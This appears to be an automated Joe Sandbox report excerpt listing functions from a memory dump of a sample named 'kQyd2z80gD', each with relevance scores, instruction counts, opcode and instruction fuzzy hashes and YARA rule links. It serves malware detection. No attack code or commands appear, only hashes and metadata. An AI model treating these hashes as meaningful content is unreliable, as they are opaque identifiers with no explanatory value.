Opcode Fuzzy Hash: 1ead1b09f9fd39f9271d1836aa696abf02f171bfdc4a74478fedac716654cd9d
Instruction Fuzzy Hash: D621A1A2D0E2D28FE35B637C34242F86E506F42694F2901FAD0894E1E3CF4E1845935B

Function 00007FF848F21ADC Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848F21B4C

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b6440a1b1182a189e825a8a039f2453ebec559354577dd6ac868c014c351d846
Instruction ID: acbba79ebe858c8e05cedbd68cab5afe2aa76fafa5c1bac00a3d5998a07de8af
Opcode Fuzzy Hash: b6440a1b1182a189e825a8a039f2453ebec559354577dd6ac868c014c351d846
Instruction Fuzzy Hash: 94114C31D1D549AFEB59EB98E4545AEBBB0FF58740F1440B9D00A932C2DF296942CB18

Function 00007FF848F104F2 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

?O_^, xrefs: 00007FF848F10501

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: ?O_^
API String ID: 0-1127923838
Opcode ID: 78fce0b6ceeada589122ead66e9cbcf02cb17f394774ba7fe412200c72cb565b
Instruction ID: 9acf2b41bd81059620d30fb62d4d2e8da1754e727e46be029167d93f6e295c4d
Opcode Fuzzy Hash: 78fce0b6ceeada589122ead66e9cbcf02cb17f394774ba7fe412200c72cb565b
Instruction Fuzzy Hash: 1201C431A0D69D8FC781FF2C98911E67BA0FF81365F04017AD04CCA183DB295899C7A9

Function 00007FF848F104F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

?O_^, xrefs: 00007FF848F10501

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: ?O_^
API String ID: 0-1127923838
Opcode ID: f5e89139de688d03823e4eb9e7579aa1069b42f57b96184fe7bcea717f1cc695
Instruction ID: d6e5bb21ea327c17a42c1d387d9c8a2ece90168e0029ff346962d5ddc1c9c0b8
Opcode Fuzzy Hash: f5e89139de688d03823e4eb9e7579aa1069b42f57b96184fe7bcea717f1cc695
Instruction Fuzzy Hash: D201D23190D25EDFC781FF2898411F67BA0FF41354F04017AE00CCA183DB285855C7A8

Function 00007FF848F20388 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

u, xrefs: 00007FF848F238A1

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-1515575680
Opcode ID: 4f556b4e0816659acd42e0c24e2fa34d3007a85d2d6d23c11ff53caef8c102bc
Instruction ID: 95e364a9ee1f5816378c355011f44af11a975ec3005cc558dd535cc872458155
Opcode Fuzzy Hash: 4f556b4e0816659acd42e0c24e2fa34d3007a85d2d6d23c11ff53caef8c102bc
Instruction Fuzzy Hash: 1F0169B3E1E0679EF16933AD34151FD5450AF80B91F78067AD50E5E2E68F0E2880229B

Function 00007FF848F108B1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

PrH, xrefs: 00007FF848F108EF

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID: PrH
API String ID: 0-1462561775
Opcode ID: 741d64ece040082ae99ccc60b6212f2643ff3e7c04c8782ffd1fe459d1a6f3bb
Instruction ID: f9de671749cfc31b6f157d3746666e7829600b1f044db6a9eebb389ffe549fcc
Opcode Fuzzy Hash: 741d64ece040082ae99ccc60b6212f2643ff3e7c04c8782ffd1fe459d1a6f3bb
Instruction Fuzzy Hash: 27F0697180C64D9FE754FB2899992E97FA0EF85350F5401EAD408C6192DB3869558740

Function 00007FF848F21C7E Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0672f40593a3d7abe3b7dc736683d305fa6a6a8119028e954d8d6d6e80bc2db
Instruction ID: bbe5ecdafe30525d2d65de73f3cfce5344f3480f60ddabd01dd238c89e7316ee
Opcode Fuzzy Hash: b0672f40593a3d7abe3b7dc736683d305fa6a6a8119028e954d8d6d6e80bc2db
Instruction Fuzzy Hash: 61B14830A2CA664FF31CAB58A8911B476D0FB45354F64467DD4DBC35CBDA2DB8838389

Function 00007FF848F1E5BF Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe1af128a47d22de2bd823b13a5b4d3743af3e902eea93f5247fce6b9c54b4c
Instruction ID: 3196cd4642c42ab64a7fa78fb3f4f6582b6d45aba0793e99864b05e594952398
Opcode Fuzzy Hash: 3fe1af128a47d22de2bd823b13a5b4d3743af3e902eea93f5247fce6b9c54b4c
Instruction Fuzzy Hash: 02D1AB3091C6568FEB48DF18C4D45B57BA1FF55350BA446BDC84A8B68ACB38F882CB85

Function 00007FF848F1E5DF Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 264e291d4590fee6a5016625f4212ee7ce90870455fd809dea2194f5afdf342d
Instruction ID: 60aaa6881dd787699b80ccb0ce1fd24cfd5e960371eef10ecb90058b6a34a3c2
Opcode Fuzzy Hash: 264e291d4590fee6a5016625f4212ee7ce90870455fd809dea2194f5afdf342d
Instruction Fuzzy Hash: 3EC1AB3091C6568FEB49DF18C0E05B577A1FF45350BA446BDC84A8B6CADB38F881CB89

Function 00007FF848F1DE72 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e71409b20c3fc315188818b45685318031de3cbff41d7d9bc1456913f2ae12fb
Instruction ID: f03aa09f15a75bf99f5070dfad6e6a1e89cea5efb90a3cee69858eda7a1bc25b
Opcode Fuzzy Hash: e71409b20c3fc315188818b45685318031de3cbff41d7d9bc1456913f2ae12fb
Instruction Fuzzy Hash: 84B1A030A1CA469FE789EB28C0906A5B7A1FF58350F54457AD04EC7AC6DF28BC51CB98

Function 00007FF848F1B44F Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec2262ca2d1e181852104f758d5dda808eb3f18511920aada907bc00749b6b92
Instruction ID: dc9e5facc685498c8f70cdf46b6cc2758cfc1225699b233cd0785be32d0030d3
Opcode Fuzzy Hash: ec2262ca2d1e181852104f758d5dda808eb3f18511920aada907bc00749b6b92
Instruction Fuzzy Hash: D821B132E2D5A3CEF564776939691FC5650EFA13E5F6C02B6C40D8A0D2EE0C2C86539A

Function 00007FF848F216E5 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32396906b619dcfddc9777481442d79e3b301c40bbb27afd4461ba072f7a43c9
Instruction ID: 921510516b70e4f92d38f9f2ffecb64bf2477c0f8384e13c309c73a9972e62ec
Opcode Fuzzy Hash: 32396906b619dcfddc9777481442d79e3b301c40bbb27afd4461ba072f7a43c9
Instruction Fuzzy Hash: E1A19130A1CA464FE758EB59D0906A6B7E1FF59340F54497DC08FC3AD6DB39B8828B48

Function 00007FF848F1D3A6 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dcc7863509715e57cb3bcd04399eaaea9a22cbb61d5184cbd3b124b058b574f
Instruction ID: 257aff2f8a2b0e4d5fc0ec60fd8363323c6fe0fc8f3c869d54fa89c53df30564
Opcode Fuzzy Hash: 1dcc7863509715e57cb3bcd04399eaaea9a22cbb61d5184cbd3b124b058b574f
Instruction Fuzzy Hash: D581F431A1DA468FE769BB289445179B7F1FF85394F14017ED08EC31C2DB29BC02879A

Function 00007FF848F235C9 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa2c4157db1cd68e39fadf80e5047fccba0e356b4c0da74251947114b9ec302
Instruction ID: 23847e1e599ba159663c8ab09cb4cc2cac6080efadac93a4daa549ced07beab0
Opcode Fuzzy Hash: baa2c4157db1cd68e39fadf80e5047fccba0e356b4c0da74251947114b9ec302
Instruction Fuzzy Hash: D7712AB190C44A4FEB68EB1CA4169B57BD0EF44350F1002B9D49EC76F2EF19A80A8786

Function 00007FF848F1868B Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e4d1309b5f6b144b8ca6c6fa15e7215c25fd19aaae17d4618028beefe70ecc
Instruction ID: 9aa2047fa70f6ac6d03d2a71363b4d76948328c50be89d2510038dce7dd6f2fd
Opcode Fuzzy Hash: c9e4d1309b5f6b144b8ca6c6fa15e7215c25fd19aaae17d4618028beefe70ecc
Instruction Fuzzy Hash: B1718B71E2994E5FE794AB58D9652FDBBB2FF54380F84057AD109C72D6DF282C028B80

Function 00007FF848F1BCBB Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf35b30b7af8ff2109088c9532b5d73fc92469edcb9e25a0e3d5c63b076fc42a
Instruction ID: c7d21bf89f4149bd17ee4574e88f3357e0ba11816c697315295c8fc69c4dfb8b
Opcode Fuzzy Hash: bf35b30b7af8ff2109088c9532b5d73fc92469edcb9e25a0e3d5c63b076fc42a
Instruction Fuzzy Hash: F2717C30D2DA4EDEEB99EB6484546BDBBB1FF49380F5804BAD00AD71C1DF286C418759

Function 00007FF848F17358 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08863badf2a0ff959493c7c0c4c7d65efdee5d79daa6278d68b4e57548b3e53
Instruction ID: 6a6cc719c67c3b8fc82c6d2b04bb5d4ad58454ee6f03fe8143b2a1f22e396ff5
Opcode Fuzzy Hash: b08863badf2a0ff959493c7c0c4c7d65efdee5d79daa6278d68b4e57548b3e53
Instruction Fuzzy Hash: 5091B17091852E8FDBA9EF18C895BE9B7B1FB59340F5041A9D00DE3291DB34AE81DF44

Function 00007FF848F204AF Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f7b53b87f4e108fd0bd48de70abffb3914125df5631b20518be4c651d633f9
Instruction ID: b064dec4bfc14cbcc96f27c406bd75f4adb60ab62bfd2f05672839ad47d0b6b7
Opcode Fuzzy Hash: a2f7b53b87f4e108fd0bd48de70abffb3914125df5631b20518be4c651d633f9
Instruction Fuzzy Hash: 4A51BD23A1F5B25FD241B77CB8661EB7F60EF412A9B0C42B7D488CE0D3DE0D544A8299

Function 00007FF848F1F601 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d3ecc31b1c204a19d3985733770ab50f22a8cb44def18f856f6742d7cd3f563
Instruction ID: 48d0a6cb8c2361ed9b5d145db64c0a4db6a871be069af91de8c1ecedb01cdf54
Opcode Fuzzy Hash: 9d3ecc31b1c204a19d3985733770ab50f22a8cb44def18f856f6742d7cd3f563
Instruction Fuzzy Hash: EA819A3090DB068FE369EB28D19457277A1FF44354F60497EC88A87AD2CB39BC82CB45

Function 00007FF848F20EC6 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc14bb3da30d872d7c6b332ff3f99fc7072dbfac27d9edb705f1f1ba222abf3
Instruction ID: 2074a7f4670eaba9ebd94c3864831bfc4a1eaa34e92997cad197b98d974cc487
Opcode Fuzzy Hash: 1fc14bb3da30d872d7c6b332ff3f99fc7072dbfac27d9edb705f1f1ba222abf3
Instruction Fuzzy Hash: 9E51043294DA964FE325AB68B455175BBE0EF813A0F0401BED44AC71C2DF1EB8468399

Function 00007FF848F16163 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0134d5579cdf3c03e395da6856883eb62b15cf508cec8fc5c285a85a0b2b49b1
Instruction ID: a34c6d205a70cbe765e793d06bb5a082f00ba9b53b76ba5de35c09395af60105
Opcode Fuzzy Hash: 0134d5579cdf3c03e395da6856883eb62b15cf508cec8fc5c285a85a0b2b49b1
Instruction Fuzzy Hash: 2C71D470D1991D9FEB94EBA8C8997ADB7B1FF58340F1041AAD00DE3296DF346D818B44

Function 00007FF848F228ED Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4520d9a232d5c0cf8340aeb99b0290db8383dab7464290cc93b8d5e93cd4698b
Instruction ID: 419dc5308291eaa26bec6df8b97cacec6fbeaf1d5e4618c584b27a25cec42bfb
Opcode Fuzzy Hash: 4520d9a232d5c0cf8340aeb99b0290db8383dab7464290cc93b8d5e93cd4698b
Instruction Fuzzy Hash: AB515030A18B064FE364EB54E5856A6B7E1FF54340F504DBDC48AC7AD6DB3AB882CB44

Function 00007FF848F12CF8 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2561872e5b924e0eaf6be4c31baf58073dc66b9bfd6fa6e3367152ffaf347328
Instruction ID: 70aad2394fb715c24f010f487bdd064b11f107d73de2f30e1ac7e22be44f629c
Opcode Fuzzy Hash: 2561872e5b924e0eaf6be4c31baf58073dc66b9bfd6fa6e3367152ffaf347328
Instruction Fuzzy Hash: 6B41F371E1895D8FEB94EBA8D895AECB7B1FF69340F400129D40DE3292CB74AC41CB44

Function 00007FF848F29DC4 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb0f2f9c3e970f88b594253bca8ca8cc9f44a142cc07990548c96df1a3db906c
Instruction ID: 6aef3121818fd09769111d1e1d228c9b5b5f8e27b4fd493f95f1c0f27d9a26fc
Opcode Fuzzy Hash: bb0f2f9c3e970f88b594253bca8ca8cc9f44a142cc07990548c96df1a3db906c
Instruction Fuzzy Hash: 3951F470E09A5D8FDB95EBA8E894BACB7F1FF58300F1041A9D00DE3285DB356985CB44

Function 00007FF848F10EA8 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cd67f96bc74ec488053025b433f048c43ccb2d06a14e68b2d8dfdce63989892
Instruction ID: 6f9c839ade72403be28650187ac886c2b524a49d96bb009d96e77acc786df498
Opcode Fuzzy Hash: 2cd67f96bc74ec488053025b433f048c43ccb2d06a14e68b2d8dfdce63989892
Instruction Fuzzy Hash: 2A41F371E1895D8FEB94EBA8D895AEDB7B1FF69340F400129D40EE3291CB74AC41CB44

Function 00007FF848F1B19C Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de906cd744f5573d8634dfe460444dac852c454b63457f6db75ab339a5f15e8a
Instruction ID: d1fab2af25060ffd1a77d58eca890ced88ddf729d4ea1be97457d0acd8d1c12f
Opcode Fuzzy Hash: de906cd744f5573d8634dfe460444dac852c454b63457f6db75ab339a5f15e8a
Instruction Fuzzy Hash: 9F41B431A1C989CFEBE9EB08D8456A873D1FF98351F48027AE44DC7592DB24AC498754

Function 00007FF848F1E950 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db088ea7d68bd44263c3f8425af8c2a98d9d83a46007edf4f12579157ea73b1e
Instruction ID: f428e6ae9a6dcbd41a6a604aebd6b29f483099f4d10243b4c511e1affd947bb0
Opcode Fuzzy Hash: db088ea7d68bd44263c3f8425af8c2a98d9d83a46007edf4f12579157ea73b1e
Instruction Fuzzy Hash: 6841D330D1C99E8EE7A8EB1884646B8B7A1FF54340F5445BAC44ECB1C6CF386D858745

Function 00007FF848F18DF5 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085dd25fc1bf97364d868cb47e0728f3ff9701dbfcee62f63d189951b1f9a9f2
Instruction ID: 15f5796ffa465d7bacb7650671350fd5344e73985f5459b1ea9ce30cb3314923
Opcode Fuzzy Hash: 085dd25fc1bf97364d868cb47e0728f3ff9701dbfcee62f63d189951b1f9a9f2
Instruction Fuzzy Hash: DB41373191865E8FDBA5EF68C8447E9BBB0FB59340F0001AAD40DE3291DB34AE94CB84

Function 00007FF848F1FC27 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd17a0c47170c9c53b98ceb9e6a8f84b3a30f6a433345ddc8d74d8e9ef0da1a
Instruction ID: 5131ccdc3e5997bf5daba547cfcc4d6af9caed250ee5e3678f5e700b5a89e1f5
Opcode Fuzzy Hash: 4fd17a0c47170c9c53b98ceb9e6a8f84b3a30f6a433345ddc8d74d8e9ef0da1a
Instruction Fuzzy Hash: 04416131A0C9199FDB99EB18C495EA9B3E1FBA9310B0405ADD44EC71C2DF25FD85CB81

Function 00007FF848F1FCD1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50dbf349211d875b8f705ae98930e7e0d0c44c9bb72addac269dba064556bc3e
Instruction ID: 8677fd0d8f7f57e1a35d1e8a2ebc46cc6fd6cff89c3b4e72b0d37fb77b9d05e0
Opcode Fuzzy Hash: 50dbf349211d875b8f705ae98930e7e0d0c44c9bb72addac269dba064556bc3e
Instruction Fuzzy Hash: B7319031A0C9598FDB99EB28C495E6973E1FFA9310B0406ADD44AC71D2CF28FC84CB81

Function 00007FF848F18A6A Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6999e031b2c8cc2bd7a1adb71733d258a4530d6d1d3b87d6860685d2fc26baa
Instruction ID: 997d1c62842b58fc91810d6d685e6749fd953543593f68409b860ac5effcf640
Opcode Fuzzy Hash: a6999e031b2c8cc2bd7a1adb71733d258a4530d6d1d3b87d6860685d2fc26baa
Instruction Fuzzy Hash: 02315971D1DA4D8FDBA4EB1899513F8B7A1FB55340F9002B9C40EE32C1DF3869829B44

Function 00007FF848F18E2D Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac5841c53e95c52e0a4d7aa9b8ba4f0df15fd638cc3fdc480083134ae4c2c6da
Instruction ID: e56726befd79b285296603b937bef16fa065626bc49111f09e0072c32901cfcd
Opcode Fuzzy Hash: ac5841c53e95c52e0a4d7aa9b8ba4f0df15fd638cc3fdc480083134ae4c2c6da
Instruction Fuzzy Hash: C8413A7085865E8FDBA5EF2888557E97BF0EF19300F0401AAE00DE7292DB349981DB84

Function 00007FF848F11828 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080ff3b6cd400410573025be5aba3ccc7dfe246ed4ca605f6685ec05e428a6c7
Instruction ID: 2a3e9dbc1a28da417e90cd6a899ece289190a980c3a4f6b42226cfe61ee8f4d0
Opcode Fuzzy Hash: 080ff3b6cd400410573025be5aba3ccc7dfe246ed4ca605f6685ec05e428a6c7
Instruction Fuzzy Hash: 62317C30C0D61E8EEB64BB1498117FDB2A1FF52390F606279D45E921C2DF396D89CB88

Function 00007FF848F1FC6B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6298ca39f433a42e0093ff8bde9d8a7f4fc860e8d27858cf448e689bb7e9bb12
Instruction ID: f6a1eeade2f84bf92ab8c8bd46ad47ea096ca094414094d41308529b8a30781c
Opcode Fuzzy Hash: 6298ca39f433a42e0093ff8bde9d8a7f4fc860e8d27858cf448e689bb7e9bb12
Instruction Fuzzy Hash: B6318131A0C9199FDB99EF28C495EA973E1FBA9310B0405ADD44AC71D2CF28FC85CB81

Function 00007FF848F164E9 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa3b70a27fbdc13e95f9384054b69bf4a5e95bfde4a4e77f5c76fd7da3880d4
Instruction ID: 054dd52218208719bb72880d7a2f0c1193137c4e80014a30cd8b1beb37e8b035
Opcode Fuzzy Hash: 8aa3b70a27fbdc13e95f9384054b69bf4a5e95bfde4a4e77f5c76fd7da3880d4
Instruction Fuzzy Hash: F5416970C0D7998FEB55EBA4C8996EDBBB1FF5A300F5001BAD009E7296CB395981CB41

Function 00007FF848F15FDD Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2184253726.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_kQyd2z80gD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ce7b915c422cf999bc34f1a28514165c1ea7443c3d5d51592d91c67e951414
Instruction ID: c18acec1ae8958726738c5d94c23c42f23e6e61ff7cf5cb0310bb7d882a4dcb2
